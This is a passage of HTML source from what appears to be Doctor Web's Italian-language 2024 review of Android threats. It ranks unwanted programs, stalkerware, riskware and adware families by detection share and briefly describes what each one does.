        Il programma indesiderato più frequentemente rilevato nel 2024 è stato &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;. Ha rappresentato oltre la metà — il 52,10% — del numero totale dei 
        software indesiderati rilevati sui dispositivi protetti. Appartiene a una classe di applicazioni che suggeriscono agli utenti di guadagnare completando varie attività, ma in fin 
        dei conti non pagano alcuna reale ricompensa.
    &lt;/p&gt;
    &lt;p&gt;
        I programmi che l'antivirus Dr.Web rileva come &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; si sono collocati alla seconda posizione con una quota del 19,21% (una crescita di 9,75 pp. 
        rispetto all'anno prima). Tali applicazioni vengono modificate tramite il servizio cloud CloudInject — ad esse vengono aggiunti autorizzazioni pericolose e un codice offuscato il 
        cui scopo non può essere controllato.
    &lt;/p&gt;
    &lt;p&gt;
        L'attività delle applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; diminuisce per il secondo anno consecutivo — esse sono rimaste terze per diffusione con un indicatore del 
        10,07%, il che è di 9,35 pp. in meno rispetto al 2023. Questi programmi simulano il funzionamento degli antivirus, rilevano le minacce inesistenti e suggeriscono ai proprietari 
        di dispostivi Android di acquistare una versione completa per "risolvere" i presunti problemi rilevati.
    &lt;/p&gt;
    &lt;p&gt;
        Durante l'anno passato gli utenti si imbattevano in vari programmi per la sorveglianza e il controllo dell'attività. Tali software possono essere utilizzati per raccogliere dati 
        sia con il consenso dei proprietari di dispositivi e sia a loro insaputa — nel secondo caso, essi effettivamente si trasformano in strumenti di spionaggio. Il più frequentemente 
        sui dispositivi protetti da Dr.Web venivano rilevati i programmi per monitoraggio 
        &lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2,40% dei casi), &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2,03% dei casi), 
        &lt;a href="https://vms.drweb-av.it/search/?q=Program.wSpy&amp;lng=it"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt; (0,98% dei casi), &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; (0,90% dei casi), 
        &lt;a href="https://vms.drweb-av.it/search/?q=Program.Reptilicus&amp;lng=it"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt; (0,64% dei casi), &lt;a href="https://vms.drweb-av.it/search/?q=Program.wSpy&amp;lng=it"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (0,39% dei casi) e &lt;a href="https://vms.drweb-av.it/search/?q=Program.MonitorMinor&amp;lng=it"&gt;&lt;b&gt;Program.MonitorMinor&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; (0,38% dei casi).
    &lt;/p&gt;
    &lt;p&gt;
        Inoltre, erano diffusi i programmi Android &lt;a href="https://vms.drweb-av.it/search/?q=Program.Opensite&amp;lng=it"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;, il cui obiettivo è quello di caricare siti impostati e visualizzare annunci pubblicitari. 
        La loro quota ha ammontato allo 0,60% dei rilevamenti dei software indesiderati.
    &lt;/p&gt;
    &lt;p&gt;Le dieci applicazioni indesiderate più spesso rilevate nel 2024 sono:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" alt="Most_Common_Unwanted_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.wSpy&amp;lng=it"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma spia commerciale per il monitoraggio nascosto dei proprietari di dispositivi Android. Consente ai malintenzionati di leggere la corrispondenza (messaggi in popolari programmi di messaggistica istantanea ed SMS), ascoltare l'ambiente, tracciare la posizione del dispositivo, monitorare la cronologia del browser, ottenere l'accesso alla rubrica e ai contatti, alle fotografie e ai video, fare screenshot e scattare fotografie con la fotocamera del dispositivo, nonché ha la funzionalità keylogger.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.Reptilicus&amp;lng=it"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazione che consente di seguire i proprietari di dispositivi Android. È in grado di controllare la posizione del dispositivo, raccogliere dati circa la corrispondenza SMS e conversazioni sui social network, ascoltare telefonate e l'ambiente, catturare screenshot, tenere traccia dell'input da tastiera, copiare file dal dispositivo ed eseguire altre azioni ancora.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.Opensite&amp;lng=it"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi Android affini il cui obiettivo è quello di caricare siti impostati e visualizzare annunci pubblicitari. Tali applicazioni sono spesso mascherate da altri software. Ad esempio, esistono varianti che vengono distribuite sotto le apparenze di un lettore video YouTube. Caricano il vero sito del servizio web e visualizzano banner pubblicitari tramite SDK pubblicitari connessi.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Programmi potenzialmente pericolosi&lt;/h3&gt;
    &lt;p&gt;
        Le utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, che consentono di avviare le applicazioni Android senza la loro installazione, nell'anno passato hanno mantenuto 
        le posizioni leader tra i rilevamenti dei software potenzialmente pericolosi. In totale, hanno rappresentato oltre un terzo di tutti i programmi di questo tipo 
        rilevati. Il più spesso sui dispositivi venivano riscontrate le varianti
        &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt; (16,17%), &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (9,80%), 
        &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (3,25%) e &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2,99%).
    &lt;/p&gt;
    &lt;p&gt;
        Altri diffusi programmi potenzialmente pericolosi sono state le applicazioni modificate tramite l'utility NP Manager. Questa utility incorpora nel software 
        di destinazione un modulo speciale che consente di bypassare il controllo della firma digitale dopo la modifica effettuata. L'antivirus Dr.Web rileva tali programmi 
        come diverse varianti della famiglia &lt;b&gt;Tool.NPMod&lt;/b&gt;. Tra queste, il più frequentemente venivano rilevate le variazioni 
        &lt;b&gt;Tool.NPMod.1&lt;/b&gt;. Hanno notevolmente rafforzato le proprie posizioni nel corso dell'anno: rappresentano il 16,49% dei rilevamenti delle applicazioni potenzialmente 
        pericolose, il che è di 11,68 pp. in più rispetto al 2023. Contemporaneamente, la quota dei software modificati dall'utility NP Manager, che vengono rilevati da un 
        altro record di virus — &lt;b&gt;Tool.NPMod.2&lt;/b&gt;, — ha ammontato al 7,92%. Come risultato, in totale, i campioni di questa famiglia sono stati responsabili di quasi un 
        quarto di tutti i rilevamenti dei programmi potenzialmente pericolosi.
    &lt;/p&gt;
    &lt;p&gt;
        Tra i leader sono state anche le applicazioni protette da un packer &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; — venivano rilevate nel 13,17% dei casi il che è di 12,38 pp. 
        in più rispetto all'anno prima. Inoltre, dal 3,10% al 3,93% è cresciuto il numero di rilevamenti di &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. 
        Questo è un framework che consente di modificare i programmi Android installati ed eseguire gli script Lua, che potenzialmente possono essere malevoli.
    &lt;/p&gt;
    &lt;p&gt;
        Con tutto ciò, l'attività di uno dei leader dell'anno 2023, quella della famiglia di utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;, 
        al contrario, è alquanto diminuita — dal 14,02% all'8,16%. Queste utility consentono di modificare i programmi Android con l'aggiunta ad essi di script scaricati 
        da internet. Sono stati meno frequenti anche i programmi protetti da un'utility di offuscamento &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscapk&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscapk&lt;/b&gt;&lt;/a&gt; (un calo dal 3,22% all'1,05%), 
        nonché da un packer &lt;a href="https://vms.drweb-av.it/search/?q=Tool.ApkProtector&amp;lng=it"&gt;&lt;b&gt;Tool.ApkProtector&lt;/b&gt;&lt;/a&gt; (un calo dal 10,14% al 3,39%).
    &lt;/p&gt;
    &lt;p&gt;Le dieci applicazioni potenzialmente pericolose più diffuse rilevate su dispositivi Android nel 2024 sono:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" alt="Most_Common_Riskware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Piattaforme software potenzialmente pericolose che consentono ad applicazioni di avviare file APK senza installazione. Creano un ambiente di esecuzione virtuale che non influisce sul sistema operativo principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi Android il codice dei quali è cifrato e offuscato dall'utility NP Manager.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Applicazioni pubblicitarie&lt;/h3&gt;
    &lt;p&gt;
        Il software pubblicitario più diffuso nel 2024 è diventata una nuova famiglia di programmi &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt; 
        — ha rappresentato il 47,45% dei rilevamenti. I capoclassifica dell'anno precedente, i campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; 
        finiscono secondi con il 14,76% (un calo del numero di rilevamenti di 21,06 pp.). Alla terza posizione con un indicatore dell'8,68% si è 
        collocata un'altra nuova famiglia di applicazioni pubblicitarie &lt;b&gt;Adware.Basement&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Risultano diffuse anche le famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (la quota è scesa dall'8,59% al 4,35%), &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (un calo dal 4,41% al 3,29%), 
        &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Leadbolt&amp;lng=it"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (un calo dal 4,37% al 2,26%), &lt;b&gt;Adware.ShareInstall&lt;/b&gt; (un calo dal 5,04% all'1,71%). I programmi pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Adware.MagicPush&amp;lng=it"&gt;&lt;b&gt;Adware.MagicPush&lt;/b&gt;&lt;/a&gt; 
        che nel 2023 occupavano la seconda posizione hanno significativamente ridotto l'attività e non sono riusciti a entrare nella top ten spostandosi in undicesima posizione 
        con un indicatore dell'1,19% (un calo di 8,39 pp.).
    &lt;/p&gt;
    &lt;p&gt;Le dieci applicazioni pubblicitarie più diffuse rilevate su dispositivi Android nel 2024 sono:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" alt="Most_Common_Adware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Modulo adware che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ShareInstall&amp;lng=it"&gt;&lt;b&gt;Adware.ShareInstall&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Modulo adware che può essere integrato in programmi Android. Visualizza notifiche pubblicitarie sulla schermata di blocco del sistema operativo Android.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Youmi&amp;lng=it"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un modulo adware indesiderato che colloca scorciatoie pubblicitarie sulla schermata iniziale di dispostivi Android.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Inmobi&amp;lng=it"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di alcune versioni di un SDK pubblicitario Inmobi, che sono in grado di effettuare telefonate e aggiungere eventi al calendario di dispostivi Android.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Minacce su Google Play&lt;/h2&gt;
    &lt;p&gt;
        Nel 2024 gli analisti dei virus dell'azienda Doctor Web hanno individuato sullo store di app Google Play oltre 200 minacce con più di 26.700.000 
        download complessivi. Oltre al trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; tra di esse erano molti altri malware — ad esempio, i trojan pubblicitari 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Essi venivano distribuiti sotto le apparenze dei più svariati software: app di fotoritocco, scanner di codici a barre, 
        raccolte di immagini e persino un allarme "antifurto" per la protezione dello smartphone dalle mani sbagliate. Tali trojan nascondono le proprie icone 
        dopo l'installazione e cominciano a visualizzare una pubblicità aggressiva che si sovrappone all'interfaccia del sistema e degli altri programmi e 
        interferisce con il normale utilizzo del dispositivo.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
